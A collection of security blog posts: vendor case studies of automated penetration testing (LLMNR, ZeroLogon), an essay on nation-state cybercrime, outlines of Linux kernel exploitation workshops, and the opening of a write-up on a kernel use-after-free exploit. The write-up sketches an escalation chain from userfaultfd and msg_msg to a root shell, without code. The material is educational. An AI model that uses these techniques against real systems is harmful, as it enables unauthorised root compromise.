
Higher Education Organization Improves Cybersecurity Posture with NodeZero

16 November 2022 at 20:18

When the director of technology for a higher education organization went looking for a better way to identify and prioritize security weaknesses on the school’s servers and networks, his first interaction with NodeZero started off with an impressive bang.

“I wanted to see a proof of concept, and we solved one of our biggest security holes because of that PoC,” he says. On the first op, NodeZero was able to compromise the domain admin account.
Not just one account, in fact, but four, via an LLMNR vulnerability.

“Without a lot of work, we were able to clean that up before we even licensed NodeZero – that was huge,” says their IT director.

Cybersecurity presents a complex challenge for the school, as it is spread out over several campuses and managed remotely. The director of technology is their highest-ranking technology staff member at the organization. The role oversees 400 endpoints within the organization, in addition to securing roughly 600 students on their own VLAN/Subnet during the school year.

NodeZero offers more specificity

Previous pentesting options were helpful, but often left the team chasing down vulnerabilities that turned out to not actually be exploitable.

“Often, it was just informational, and didn’t really affect your security,” he says.

He adds, “One of the things that really struck me was that it isn’t just the tool – and the tool is fantastic – but it’s the people around the tool who are available, in the chat, scheduling meetings. When I was running the PoV (Proof of Value), someone was there.”

He was also sold on NodeZero by its capability to run on demand.

“What sold me on it was seeing it at work and, because we know security is a journey and not a destination, the idea of being able to continuously run scans and pentests is great,” he says.

The team now runs weekly pentests to maintain vigilant cybersecurity on their network, he notes.

Getting the most from your time

Time management and focused effort are essential to maintaining a strong security posture. Chasing down every lead with equal time and energy isn’t helpful when not every vulnerability is actionable.

“You have critical down to informational severity issues, but I believe a tool a lot more when it says this is a critical misconfiguration we have compromised – oh and by the way, here’s your hashed password,” he says. “When that’s happened, I recognized the first and last character and knew that was the password.”

Context scoring based on critical impacts helps hammer home where to best deploy limited resources to secure
the environment.

“It’s the difference between casing a house and saying how I might be able to break in – that window might not be locked, that door doesn’t seem secure. But if you can actually break in, that’s critical. It’s the difference between telling me something might happen versus something did happen.”

Easy fixes but you need to find them first

While the LLMNR vulnerability wasn’t a huge challenge to fix, discovering it was a bit of a shock, the Director of Technology explains – and that’s why regular tests are so helpful. Security is so expansive it’s hard to cover everything.

“We try to work to secure our network, but it’s possible for any organization to miss things or have little holes” in their security, he says. A solution like NodeZero can find those small gaps that leave the organization open to risks so the team can shore them up quickly and easily.

“With stuff like LLMNR, the fix isn’t hard if you have the tools to fix a lot of machines at once,” he says. It’s identifying those risks in the grander picture that is the real struggle.
NodeZero helps uncover what you don’t know, he says, and tells you how to fix it so you don’t spend time researching the answer.
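As a sketch of what “fixing a lot of machines at once” can look like for LLMNR, the snippet below generates the per-host registry change that disables LLMNR (the documented `EnableMulticast = 0` policy value under the Windows DNS client policy key). The hostnames and the remote-`reg` deployment style are assumptions for illustration; in practice this setting is usually pushed fleet-wide via Group Policy.

```python
# Sketch: building fleet-wide LLMNR-disable commands. Hostnames are
# hypothetical; real deployments usually push this setting via Group Policy.
LLMNR_POLICY_KEY = r"HKLM\Software\Policies\Microsoft\Windows NT\DNSClient"

def llmnr_disable_command(host: str) -> str:
    """Return a 'reg add' command setting EnableMulticast=0 on a remote host."""
    return (
        f'reg add "\\\\{host}\\{LLMNR_POLICY_KEY}" '
        "/v EnableMulticast /t REG_DWORD /d 0 /f"
    )

hosts = ["ws-001", "ws-002", "dc-01"]  # assumed inventory
commands = [llmnr_disable_command(h) for h in hosts]
```

The point of the sketch is the director’s observation: once the risk is identified, the fix itself is a one-line setting replicated across the fleet.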

“You’re not chasing your tail following a large list of vulnerabilities,” he says. “It cuts down the task of securing your network because you’re starting at the critical, most impactful things. You get a view of things you just aren’t going to have without a pentest.”

Since they began incorporating NodeZero into their security program, other features, such as external pentesting, have been released, adding to the solution’s usefulness.

“There’s a lot of tools out there that just hand you the tool and you’re on your own,” he says.

“The support, being able to set up a time to answer a question, it’s all been helpful. They work with us as opposed to saying ‘We got ‘em, on to the next account.’”



Vulnerable ≠ Exploitable: A lesson on prioritization

13 September 2022 at 15:17

The Typical Approach

Pen testers, vulnerability scanners, and installed agents alert on potential vulnerabilities and breaches. You receive a list, or a notification, and you respond. Ever wonder how much of your time and effort is being wasted fixing things that don’t actually matter?

You may be surprised to hear that a large majority of all vulnerabilities are unexploitable. According to data compiled by Kenna, in 2020, only 2.7% of the vulnerabilities found appeared to be exploitable and only 0.4% of those vulnerabilities were actually observed to be exploited at all.

The prioritization of these low-risk or no-risk vulnerabilities alongside, or even above, the truly exploitable vulnerabilities can actually cause an organization’s security posture to suffer. It takes significant time and coordination to find the asset owners, bring them up to speed on the issue, prepare downtime for the asset, remediate the issue, and then confirm that the issue is remediated. Meanwhile, more critical vulnerabilities are waiting in line for their turn to be remediated. If you can’t properly prioritize, you will never secure your network.
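The prioritization gap described above can be made concrete with a small sketch: order findings so that proven-exploitable issues come before unproven ones, using scanner severity only as a tiebreaker. The finding records and field names here are hypothetical, not any particular tool’s schema.

```python
# Sketch: remediation ordering that puts proven-exploitable findings first.
# The finding records and field names are hypothetical.
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}

findings = [
    {"id": "F1", "severity": "critical", "proven_exploitable": False},
    {"id": "F2", "severity": "high", "proven_exploitable": True},
    {"id": "F3", "severity": "critical", "proven_exploitable": True},
]

def remediation_order(items):
    """Proven-exploitable first; scanner severity only breaks ties."""
    return sorted(
        items,
        key=lambda f: (not f["proven_exploitable"], SEVERITY_RANK[f["severity"]]),
    )

queue = [f["id"] for f in remediation_order(findings)]  # F3, then F2, then F1
```

Note that the unproven “critical” (F1) drops to the back of the queue behind a proven “high” (F2), which is exactly the reordering this section argues for.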

A client came to us with the goal of validating the services they were using for pentesting, vulnerability scanning, and remediation. Their IT services had all been outsourced to a managed security service provider (MSSP) with a hefty price tag; they wanted to make sure they were getting what they paid for.

The MSSP had just conducted its annual pentest of the organization’s network environment. We used NodeZero to assess the same network, with the following comparative results:

Why Coverage and Accuracy Matter

The hardest part of cyber security is deciding what NOT to fix because of limited time and resources.

Manual Pen Testing creates an incomplete snapshot:

  • No exploits exist, or the conditions to exploit are extremely unlikely, for 22 of the MSSP’s 28 critical findings
  • Poor enumeration leads to blind spots and incomplete fingerprinting – port scans are not enough!
  • Partial coverage leads to missed critical findings

Fixing 79% of the critical issues highlighted in the MSSP’s report would have been an inefficient use of time and effort. These so-called “critical issues” had no exploits, were blindly assumed due to poor enumeration, or had conditions for exploitability that were extremely unlikely.

Meanwhile, the MSSP’s team only identified one host vulnerable to BlueKeep, while NodeZero found an additional 11. NodeZero also proved three additional critical/high weaknesses, including easily guessable root access to a database server.

When the noise is removed, the critical findings are revealed.

The Difference

Thinking like an attacker gives you a distinct advantage as you devise a defensive strategy.

The attacker’s perspective asks:

  • What is an attacker interested in doing or achieving?
  • What methods are realistically at their disposal?
  • What about your environment makes achieving their intentions possible, or even easy?

We believe that these questions can only be answered by an “attacker-mindset” pentest, which should be performed frequently on your entire environment so risks do not accrue, and which should produce findings that guide your remediation actions with a heavy bias toward efficiency and return on investment. We deliver these outcomes through NodeZero, our autonomous penetration testing-as-a-service (APTaaS) platform. NodeZero is an on-demand, self-service platform that is safe to run in production and requires no persistent or credentialed agents.

Within our Portal, we provide the following supporting information for every weakness NodeZero finds:

  • Path NodeZero followed to identify/discover the weakness.
  • Proof of exploitability of the weakness.
  • Context and severity of the finding, which can be used to determine business impact.
  • Fix action report you can follow to remediate the weaknesses.

The Future State

Overall, the comparison between the MSSP’s report and the NodeZero report shows that NodeZero provides broader coverage, proves exploitability, contextualizes weaknesses, and provides the defensive team with the information they need to fix what matters.

Our work with this client exemplifies the need for a proactive security posture that includes continuous assessment, so you can catch up, keep up and even stay ahead.

Catch Up

Identify exploitable attack paths that must be fixed immediately, significantly reducing the opportunities for exploitation, sensitive data exposure, elevated privileges or remote code execution.

Your first NodeZero operation will provide this insight and minimize the time spent dealing with false positives.

“For me, the biggest benefit is the attack path identification and actual prioritization of the vulnerabilities. Other tools simply pull the CVE value, and we get hundreds of criticals and highs.”

Keep Up

Establish a purple team culture to find exploitable problems, fix them and then verify that the problems no longer exist. Your red team should be working with your blue team to maximize coordination.

You can run multiple NodeZero operations per week – our licenses give you unlimited access.
Use NodeZero’s compare feature to power your security standups.

Stay Ahead

Continuously verify your security controls – tools, processes, policies – by measuring and optimizing your detection, remediation and compliance response times.

Use our reports to show your leadership and board where you stand. Not just a compliance checkbox; this is effective security.


Patched ≠ Remediated: Healthcare Faces an Aggressive Threat Landscape

12 September 2022 at 16:23

[Image: healthcare data breaches bar chart]

The Challenge: Healthcare Faces an Aggressive Threat Landscape.

One of our clients, a leading U.S. hospital and healthcare system, consistently earns high marks for clinical excellence and is among the top 10 percent in the nation for patient safety. Recognizing the growing cybersecurity threats to healthcare organizations and the importance of maintaining compliance with regulatory standards like HIPAA, PCI, and other privacy rules, the organization’s IT staff worked hard to ensure a strong security posture.

Our client’s IT team had adopted many security best practices and tools, including state-of-the-art firewalls, vulnerability scanning, endpoint detection and response (EDR), automated patch management, network segmentation, and a managed security service provider (MSSP). In addition, the team began implementing a zero-trust architecture and has tools to monitor the many specialized medical devices on its hospital networks.

Even with these comprehensive security practices in place, the team wanted to do more. Hackers have increasingly targeted the healthcare industry. In 2020, over 600 data breaches of 500 or more patient records were reported. Ransomware attacks continue to be extensively used against healthcare organizations, and these attacks are becoming more costly.

The Solution: NodeZero™ Automated Red Teaming

Liberman Networks, a managed security and IT services company, recognized that even with their many controls implemented, our client could still be vulnerable to an attack. Liberman Networks called on us to help validate our client’s defenses and provide proof of what was truly effective and which deficiencies remained.

Our client used NodeZero – a fully autonomous SaaS offering that views the network from the attacker’s perspective – to conduct a comprehensive penetration test across its enterprise. In a matter of minutes and with virtually no configuration, NodeZero began its reconnaissance, mapping the organization’s infrastructure and over 8,400 hosts, probing for misconfigurations, open ports, and other vulnerabilities an attacker could exploit, whether alone or by chaining multiple weaknesses.
[Image: “patched does not equal remediated” attack path diagram]

The Findings: Unauthenticated Access to Domain Controllers

NodeZero ran for eight days with no adverse impact to the network.

NodeZero identified 31 vulnerabilities with 278 unique attack paths, proofs for each, and remediation guidance.

The most significant and surprising finding was immediately communicated to our client by Liberman Networks – even before NodeZero completed its testing. Ten Microsoft Active Directory domain controllers were vulnerable to ZeroLogon – a “critical” and potentially catastrophic privilege escalation vulnerability allowing unauthenticated access to devices, first disclosed a year prior to the NodeZero test. Worse, an exploit was publicly available, making the vulnerability an easy target. Had attackers targeted the vulnerable hosts, they could have quickly created their own credentials and gained unfettered access to every system in the organization. The result could have included stealing patient information and financial data or installing ransomware on our client’s endpoints and databases.

[Image: findings statistics]

“We patched this back in February. All of our reporting shows it as patched.” — Director of Infrastructure

Lesson 1: Reporting Tools Can Lie.

At first, our client believed NodeZero was in error. They were diligent in their patching, and their records showed a successful update for the ZeroLogon vulnerability months earlier. Our client also had evidence: reporting from Qualys and Microsoft Deployment Image Servicing and Management (DISM) showed all systems were patched, and they trusted their tools.

In this case, trusting the tools was a mistake. Liberman Networks and our customer success team investigated further and confirmed that the updates had been unsuccessful. When our client reapplied patches to the 10 servers, a subsequent test showed that 4 of the 10 devices remained vulnerable – despite once again showing as patched in Microsoft’s tooling.

A security solution blocked security updates for 18 months.

After further analysis, our client found the problem: a misconfiguration in their EDR solution had blocked patches on the domain controllers for the past 18 months! The failures were not propagated back to the patch management system, causing their vulnerability management and monitoring tools to incorrectly report a successful patch install. After patches were manually pushed to each domain controller, NodeZero was quickly re-run, proving that the problem had truly been remediated.
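The failure mode above suggests a simple cross-check, sketched below with made-up hostnames: intersect what patch reporting claims is fixed with what a pentest actually proves exploitable. Anything in both sets is a false remediation that needs attention.

```python
# Sketch: cross-checking patch reports against pentest results.
# Hostnames are illustrative, not the client's actual environment.
reported_patched = {"dc-01", "dc-02", "dc-03", "dc-04"}  # per patch management
proven_vulnerable = {"dc-02", "dc-04"}                   # per pentest proof

# Hosts the reporting tools claim are safe but an attacker can still exploit:
false_remediations = reported_patched & proven_vulnerable
```

If `false_remediations` is ever non-empty, the patch pipeline is lying somewhere, which is exactly what happened here.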

“This is a good experience for me to teach the team the importance of credential use and reuse. We never would have found this vulnerability without NodeZero.” — Director of Infrastructure

[Image: remediation timeline]

Lesson 2: Patching ≠ Remediation

The lesson our client learned was simple: patching is not the same as remediating. Our client followed standard best practices in their defenses. They tracked security updates to their systems, promptly patched critical issues using industry-leading tools, and verified the patches using Microsoft DISM. As they saw, the tools can be wrong, leaving organizations vulnerable to attack.

With assistance from Liberman Networks, our client’s IT staff improved their security profile and their internal monitoring, detection, and response skills. The IT team’s increased knowledge and confidence is generating greater trust in IT by the business. By using an offensive strategy to test its defenses, the healthcare system is evolving its cybersecurity posture to match the threat landscape that it faces.

Lesson 3: Follow Patch Tuesday with Pentest Wednesday.

According to the NIST Cyber Security Framework, organizations should validate through systematic audit and assessment that they have truly fixed vulnerabilities after deploying patches. In reality, most IT teams lack the resources to do penetration testing after every patch.

After their experience with misreported patching – with proof from Liberman Networks and NodeZero – our client added a step to “Patch Tuesday”: “Pentest Wednesday” with NodeZero to validate all patches are correctly implemented and risks are mitigated.



Workshop: Linux Kernel Exploitation 101 – Part 2

By: o___o
12 September 2022 at 07:25

Material used in the video (to replicate the labs):
The material was tested on Ubuntu 20.04, x86_64 architecture. There should be no problems with other releases.

To register for the September 25 workshop, follow the social pages of Cyber Saiyan (the organization behind RomHack):

  • Linkedin:
  • Twitter:
  • Link all’evento:

Also, to stay up to date on future projects, follow us on LinkedIn and Twitter:

  • Linkedin:
  • Twitter:
  • Website:

0:00 Introduction
0:25 Introduction to gdb
1:18 Compiling the kernel with symbols
3:00 Source code navigation
3:41 Source code navigation: Elixir
7:04 Source code navigation: search_binary_handler
12:33 Kernel Debugging
12:56 QEMU kernel debugging
13:42 Kernel Debugging: gdb
15:25 Kernel Debugging: search_binary_handler
19:56 Intel assembly primer
33:46 struct task_struct
34:40 arch/
37:51 task_struct
40:20 init_task
41:04 Kernel Debugging: init_task
47:41 Common Vulnerabilities
48:55 Memory Corruption & Weird Machine
51:25 Common Mitigations (introduction)
54:03 Heap Overflow
56:06 Lab: Heap Overflow
1:07:42 Use-After-Free
1:09:33 Lab: Use-After-Free
1:16:28 KASLR
1:17:34 SMAP & SMEP
1:19:44 SMEP
1:21:25 SMAP
1:22:54 SMAP & SMEP: x86 vs ARM
1:23:50 Exploitation Strategies
1:27:14 Victim Object
1:29:15 Victim Object: Prerequisites
1:29:48 Victim Object: Example
1:31:11 Lab: Victim Object
1:36:40 Lab: Victim Object – init_task offset
1:42:13 Conclusion


Workshop: Linux Kernel Exploitation 101 – Part 1

By: o___o
12 September 2022 at 07:22

Material used in the video (to replicate the labs):
The material was tested on Ubuntu 20.04, x86_64 architecture. There should be no problems with other releases.

To register for the September 25 workshop, follow the social pages of Cyber Saiyan (the organization behind RomHack):

  • Linkedin:
  • Twitter:
  • Link all’evento:

Also, to stay up to date on future projects, follow us on LinkedIn and Twitter:

  • Linkedin:
  • Twitter:
  • Website:

00:00 Video introduction
00:41 Workshop introduction
1:14 What is the kernel
4:04 User Mode vs Kernel Mode and protection rings
6:53 Syscalls: User Mode => Kernel Mode
8:18 Lab: Syscall
19:45 Kernel => Hardware
21:13 Hardware => Kernel
22:02 Kernel Memory
22:13 Stack vs Heap
23:48 Heap Memory Management: SLAB SLOB SLUB
24:33 SLUB
27:12 Partial slabs
29:34 SLUB API
31:08 Page Tables: User vs Kernel pointers
34:26 copy_from_user & copy_to_user
36:14 Lab: Setup introduction
38:02 Lab: Stack vs Heap
38:15 Lab: KRWX
39:33 Lab: Character device
40:44 Lab: file_operations
41:58 Lab: module_init & module_exit
42:28 Lab: Stack vs Heap
43:43 Lab: Heap & /proc
45:40 Lab: slabinfo & /sys/kernel/slab
49:21 Lab: KRWX & SLUB
1:02:02 Conclusion


Healthcare Staffing Organization Puts Cybersecurity Best Practices in Place with NodeZero

31 August 2022 at 15:29

The director of security engineering at a national healthcare staffing organization grew up wanting to be a hacker, and he found that NodeZero’s ability to provide the attacker’s perspective was a perfect fit for keeping his organization safe.

“Security has always been on my mind. Protecting company assets has always been on my mind. We’d reached a point where our organization is big enough, people are working remotely, and I wanted to split off some of my roles and be ultimately dedicated to security,” he says.

One of the challenges he has faced over the years has been convincing the C-suite to focus on security. They always had compliance in mind and policies in place, but the organization struggled with aging software without a development cycle, and with vendors who didn’t support software once it aged out or broke down.

As a publicly traded company, they ran their annual penetration tests on their roughly 900-1,200 hosts and performed well – they had a strong firewall in place protecting them from outside threats.

“But we have ancient software inside, and one of the great things about NodeZero is that it’s internally focused. In my mind, that’s where the threats will come from,” he says.

The first time he ran NodeZero, it obtained domain admin access in 17 minutes via an overlooked machine that shared a password with other machines. It also surfaced risks and vulnerabilities in those aging internal machines and systems that might otherwise have been difficult to find.
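The shared-password finding is, at its core, a grouping problem; a minimal sketch (with fabricated hostnames and hash values) groups hosts by credential hash and flags any hash seen on more than one machine.

```python
# Sketch: flagging credential reuse across hosts. Hash values are fabricated.
from collections import defaultdict

host_hashes = {
    "ws-101": "1a2b3c4d5e6f7788",
    "ws-102": "1a2b3c4d5e6f7788",  # same local-admin hash as ws-101
    "srv-09": "9f0e1d2c3b4a5566",
}

by_hash = defaultdict(list)
for host, digest in host_hashes.items():
    by_hash[digest].append(host)

# Any hash mapped to more than one host indicates a shared password.
reused = {digest: hosts for digest, hosts in by_hash.items() if len(hosts) > 1}
```

A single shared hash like this is the kind of pivot point that turned one overlooked machine into domain admin in the story above.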

“We have folks, who have come and gone, who may have built servers I’m not aware of, that we don’t know about until NodeZero finds them, finds the misconfigurations, and helps us remediate them,” he says.

Immediate, Actionable Results

Before NodeZero, the organization would run one external pentest and one scan to check on their remediation actions.

The pentest would, regardless of vendor, use the same tools.

“You get a PDF telling your execs how you suck, and 99 percent of the stuff that says you suck are things that are such low priority you don’t care about them,” he says. “I love that with NodeZero, those are identified as low-priority, such as expired SSL certs, very minor things.”

Because other options all felt cookie-cutter, with no difference in quality, leadership simply wanted the cheapest, easiest option to check that box. Cost was always a struggle – with security seen as an annoying expense – until a key leader re-joined the company after surviving a ransomware attack at his previous organization, and now had security top of mind.

“He asked, what are you missing? I told him endpoint protection, and we had the contract signed the next day,” he says.

When it came time for addressing pentesting, there was some pushback between the dev and infrastructure teams, but once they ran a demo of NodeZero, the teams fell in line.

“I showed the demo to our network guy, who’s as big a cynic as I am, and he was blown away, saying ‘this is what we need,’” he says.

This was all happening right around the time the Log4Shell vulnerability was the talk of the cybersecurity world.

“Log4j was everywhere,” he says, but running NodeZero offered actionable mitigation right away, whereas other tools they were using at the time had a lag time of weeks.

From Once a Year to Once a Month

The organization now runs NodeZero once a month, and then retests mid-month. With NodeZero they’re able to show progress better than ever before.

“Audit and compliance guys would look at the number of vulnerabilities in a 90-day period and say the numbers have gone up, you haven’t fixed anything,” he says. “But we’re able to show them that these are new weaknesses, and that new vulnerabilities come up all the time. We’re not being measured against those 90 days, and we can compare in the middle of the month to see what’s been fixed.”
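The month-over-month comparison he describes amounts to set differences between two operations’ findings. A minimal sketch, with hypothetical finding IDs:

```python
# Sketch: classifying findings between two pentest runs. IDs are made up.
previous_op = {"zerologon:dc-01", "weak-cred:srv-09", "llmnr:subnet-a"}
current_op = {"weak-cred:srv-09", "log4shell:app-03"}

new_findings = current_op - previous_op    # surfaced since the last run
fixed_findings = previous_op - current_op  # remediated in between
persisting = previous_op & current_op      # still open, needs resources
```

Framed this way, a rising raw count no longer reads as “you haven’t fixed anything”: the fixed and new sets are reported separately.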

In fact, with NodeZero running, the only issues his team has not fixed are due to manpower, not because of testing.

“Honestly, anything that hasn’t been addressed is a resource issue on our side,” he explained.

NodeZero has also helped improve their results from other tools and resources. They were able to cut attack notification time from their MSSP from four hours to fifteen minutes, and they validated their endpoint protection by verifying that pentests are immediately detected and alerts issued – all enabling them to get more out of existing expenditures.

NodeZero has improved their overall accuracy as well, such as dismissing a false positive that came up time and again for Adobe Flash, which was no longer in use but could not be removed from some older machines.

Doing Things Other Vendors Don’t

“I don’t think you have any other competitors,” he says. “I’d have to go out and get a red team to do what NodeZero does, and it would cost twice as much for one scan.”

He also appreciates that NodeZero doesn’t just stop when it finds a vulnerability – it keeps digging. “It chains attacks, which other pentesters don’t do,” he says. “Hackers don’t say hey, I got access to this, I’ll stop here. That’s not how they operate.”

As a once-aspiring hacker himself, their director of security engineering knows that anyone who says they are 100% secure is either dishonest or naïve.

“You are going to get breached. It’s going to happen,” he says. “But the more you understand, the better you can lock things down and limit the blast radius.”

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.



An International Look at Cybercrime

29 August 2022 at 15:19

Authoritarian regimes have learned in recent years that cybercrime can be a profitable economic enterprise – so much so that they continue to invest substantial resources in large- and small-scale cybercrime. This lucrative work goes on to fund their governments and lavish lifestyles, among other things.

These nefarious nation-state actors – North Korea, Iran, Russia, and China – all steal large sums of money by targeting Western infrastructure, private and public organizations, and sometimes even entities that speak out openly against them. Furthermore, these nation-state actors have long seen the West as an existential threat on the global stage for a multitude of reasons, especially in the realms of economics, infrastructure, intelligence, and military affairs.

Economically, the battle between communist and capitalist agendas rages on, with stiff competition between Eastern and Western technology, energy, manufacturing, and more. For example, China uses its global Belt and Road Initiative (BRI), under the guise of helping struggling economies, to gain influence and essentially create debt traps for unsuspecting countries. Meanwhile, maritime power has reemerged as a vehicle for control and for asserting dominance over disputed territories (referring to China’s ambitions for Taiwan and control of parts of the Pacific – so far, an icy stalemate). Conflicts are also being fought on land, as seen with Russia’s invasion of Ukraine and Iran’s continued tensions with Israel and the U.S. over its nuclear agenda.

The Link Between Cybersecurity and Geopolitics

With this gradual increase in global cyber competition, it is no wonder that nation states continue to invest in cyber infrastructure and predominantly fight in the cyber world. Many are correct to believe that cybersecurity and geopolitics are directly linked. If anything, businesses have learned this lesson the hard way. Just because they are in the private sector and operate as multinational organizations does not mean they are immune to an enemy nation’s ransomware and cyberattacks. Worse yet, a private business operating abroad can become a target for spyware (consider China’s BRI and cyber giant Huawei) out of suspicion that it harbors its home country’s government secrets and holds “the keys to the castle.”

Overall, despite a nation state’s obvious agenda of zeroing in on military and government targets, such adversaries have become bolder and less hesitant about attacking private businesses, regardless of a company’s allegiance to serving consumers internationally. For example, many have recently pointed fingers at Russia for attacks on American companies as big as Microsoft, Apple, and Cisco, as well as for being the true culprit behind the SolarWinds fiasco in 2020.

As Dangerous as the Wild West

Due to such actions, the cyber world is now as dangerous as the Wild West. The question is, how are businesses and everyday citizens supposed to live while caught in this chaotic influx of criminal, outlaw rivalry?

The answer is: They do not. Cybersecurity has become a constant in daily life, and enemy nation states are part of the reason why. Every day, another business is on the news because it has been hacked by foreign threat actors who, with sophisticated and unsophisticated techniques, manage to destroy the finances, ambitions, and public reputation of a once-respected economic contributor.

Looking back 10 years, it would have been hard to believe that extraordinary measures (such as firewalls, multi-factor authentication, intrusion detection and prevention systems, etc.) would now need to be implemented to defend against malicious advanced persistent threats (APTs). However, doing business today means realizing that nobody is safe. It no longer matters what industry an organization belongs to or what product it peddles.

Unfortunately, businesses across the globe are not safe from APTs, regardless of industry, sector, or affiliation. APT tactics, techniques, and procedures (TTPs) continue to advance, and so should the TTPs businesses use to protect against threats.

Therefore, every private institution needs to align its policies with “security first” thinking. While most businesses have IT departments, many still lack a well-trained, sophisticated cybersecurity team within their organization. Such changes toward a more secure network and security structure need to be made, along with recruiting the people who can do the job effectively (not just a one-person team). If companies fail to get started before it is too late, most of the world will find itself at the mercy of cyber outlaws and APTs.

This post was authored by the Cyber Threat Analyst Team: Al Martinek, Corey Sinclair, and Taylor Ellis.


NodeZero: Filling a Unique Niche in Cybersecurity

23 August 2022 at 16:18

When an IT and cybersecurity team at a U.S.-based management consulting organization was searching for ways to improve its penetration testing, NodeZero was able to answer the call.

“We’d done some penetration testing in the past, and it was quite expensive,” says the organization’s infrastructure manager. “We were looking to do this on a more regular cadence and looking at different solutions we could implement.”

After running into one of our team members, they shared a rundown of what they were looking for and felt that NodeZero might be just what the situation called for.

“I liked the ease of implementation and use of the product,” he says. “And the ability to just do constant scanning and fixes without having to pay for every instance was the biggest appeal.”

The organization’s director of IT noted that there were solutions he’d encountered that could do external pentesting, but what they really needed at this stage was powerful internal pentesting capabilities.

“Looking at vulnerabilities and criticality was key for us,” he says. “And the biggest thing for me was having a full-package pentest, with all the functionality you needed to really look for and tackle vulnerabilities accordingly.”

The struggle to keep up

The organization’s biggest struggle at the time was simply keeping up with a small team – they didn’t have a dedicated team member to stay on top of alerts and investigations.

“We wanted to be able to identify vulnerabilities ahead of time and keep ahead of the game,” says their infrastructure manager. “In the past, when we were doing scans, we were able to identify issues – fortunately none required significant time to fix – but being able to identify those things and act on them before they can be exploited is huge for us with a small team.”

“In looking at and enforcing our security strategy, we’re trying to implement controls – and with NodeZero, we’re able to implement the right controls and software we need to better our environment,” says their director of IT.

This also helps with various compliance requirements, a key component of the security team’s mission, as well as uncovering any major vulnerabilities in the environment.

More frequent testing

The team wanted to be able to go in and do internal ops more often, something NodeZero makes uniquely possible.

“Being able to perform on-demand scans is really great – we can scan, make adjustments, and then run another scan to verify we’ve been successful,” says their infrastructure manager.

“We’re taking security to a higher level within the organization to obtain certifications in compliance, and this is going to help with that a lot,” says their director of IT.

Cost effectiveness and efficiency

One of the strongest draws to NodeZero was the ability to run those repeated pentest operations anytime and anywhere they needed them – without incurring additional costs.

“It’s just much more cost effective and easier to deal with the licensing,” says their infrastructure manager.

And being able to run those operations for internal pentesting set it apart from other options on the market, says their director of IT.

“It’s one thing attacking an organization from the outside, but when attacking from the inside, you need to understand it and have the capabilities to do it,” he says. “I feel NodeZero has the capacity to do that.”
Getting up and running with NodeZero was quick and easy rather than adding cycles to a team that was already running lean.

“Setting up a scan is relatively quick and painless to do,” says their infrastructure manager.

“And even the reports are very intuitive – what the report surfaces and what we need to do to mitigate that,” says their director of IT.

It’s also enabled a frequency of testing they wanted, rather than being limited by the time and cost of standard penetration tests. Before NodeZero, the organization conducted pentests once or twice a year. They already plan to increase this to quarterly, or more – maximizing their return on investment.

NodeZero enables customers to turn a small team into their own seasoned and veteran team.

“It takes on a lot of the work our team would otherwise have to go through: it conducts these investigations, finds vulnerabilities, tells us what needs to happen, and even ranks those vulnerabilities and explains why something should be considered more urgent than others,” says their infrastructure manager. “It helps prioritize work for optimal impact and address those issues that are going to be critical to our environment soonest.”

“NodeZero, I think, fills a huge missing niche. Not just the skill set or background of the company, but the actual product, enabling you to do internal and external vulnerability testing to mitigate the issues most people are facing,” says their director of IT.

If you’d like to see how NodeZero works with your organization, have our experts walk you through a demo.

Download the PDF version

The post NodeZero: Filling a Unique Niche in Cybersecurity appeared first on

Linux Kernel Exploit Development: 1day case study

13 June 2022 at 10:01


I was searching for a vulnerability that would let me practise what I had learned recently about Linux Kernel Exploitation in a “real-life” scenario. Since I had a week at Hacktive Security to dedicate to deepening a specific topic, I decided to search for a public vulnerability without a public exploit and develop one myself. After a quick introduction on how I found the known vulnerability, I will detail the exploitation of a race condition that leads to a Use-After-Free in Linux kernel 4.9.


This blog post has two parts:

  • Vulnerability hunting: About public resources to identify known vulnerabilities in the Linux Kernel in order to practise some Kernel Exploitation in a real-life scenario. These resources include: BugZilla, SyzBot, changelogs and git logs.
  • Kernel Exploitation: The vulnerability is a Race Condition that causes a write Use-After-Free. The race window has been extended using the userfaultfd technique, handling page faults from user-space, and using msg_msg to leak a kernel address and I/O vectors to obtain a write primitive. With the write primitive, the modprobe_path global variable has been overwritten and a root shell popped.

Public bugs

The first thing I asked myself was: how do I find a suitable bug for my purpose? I excluded searching by CVE, since not all vulnerabilities have an assigned CVE (usually only the most “famous” ones do), and that’s when I used the most powerful hacking skill: googling. That led me to various resources that I would like to share today, starting by saying that this is only the result of my personal work and may not reflect the best way to perform the same job. That said, this is what I’ve used to find my “matched” Nday:

  • Bugzilla
  • SyzBot
  • Changelogs
  • Git log

Kernel changelogs are definitely my favourite, but let’s say a few words about all of them.


BugZilla is the standard way to report bugs in the upstream Linux kernels. You can find interesting vulnerabilities organised by subsystem (e.g. Networking with IPv4 and IPv6, or file system with ext* types and so on) and you can also search for keywords (such as “overflow”, “heap”, “UAF” and so on) using the standard search or the more advanced one. The personal downside is the mix of a lot of “non vulnerabilities”, hangs and stuff like that. Also, you do not have the most powerful search options (e.g. some bash). However, it is still a good option and I personally pinned a few vulnerabilities that I excluded afterwards.


“syzbot is a continuous fuzzing/reporting system based on syzkaller fuzzer” (Introducing the syzbot dashboard).
Not the best GUI, but at least you can find a lot of potentially open and fixed vulnerabilities. There isn’t a built-in search option, but you can use your browser’s or parse the HTML with an HTML parser. One of the downsides, beyond the lack of searching, is the presence of tons of false positives (in the “Open” section). However, the upsides are pretty good: you can find open vulnerabilities (still not fixed), reproducers (C or syzlang), fixing commits, and reported issues follow the syzkaller nomenclature, which is pretty self-explanatory.

Syzkaller-bugs (Google Group)

The lack of search functionality in syzbot is well replaced by the “syzkaller-bugs” Google Group, from which you can find syzbot-reported bugs with additional information from the comment section and an enhanced search bar. I really enjoy this option!


That’s my favourite method: download all changelogs for your desired kernel version from the kernel CDN, and you can then work through the downloaded files with your favourite bash commands. This approach is similar to searching through git commits, but with the advantage that it is way faster. With some bash-fu, you can download all changelogs for a target kernel version (e.g. 4.x) with the following one-liner: URL= && curl $URL | grep "ChangeLog-4.9" | grep -v '.sign' | cut -d "\"" -f 2 | while read line; do wget "$URL/$line"; done.
Once all changelogs have been downloaded, it’s possible to grep for juicy keywords like UAF, OOB, overflow and so on. I found it very useful to display text before and after the selected keyword, like: grep -A5 -B5 UAF *. In that way, you can instantly get quick information about vulnerability details, the impacted subsystem, limitations, and so on.
For each identified vulnerability, it’s possible to see its patch by diffing the patch commit with the previous one (linux source from git is needed): git diff <commit before> <commit patch>.

Git log

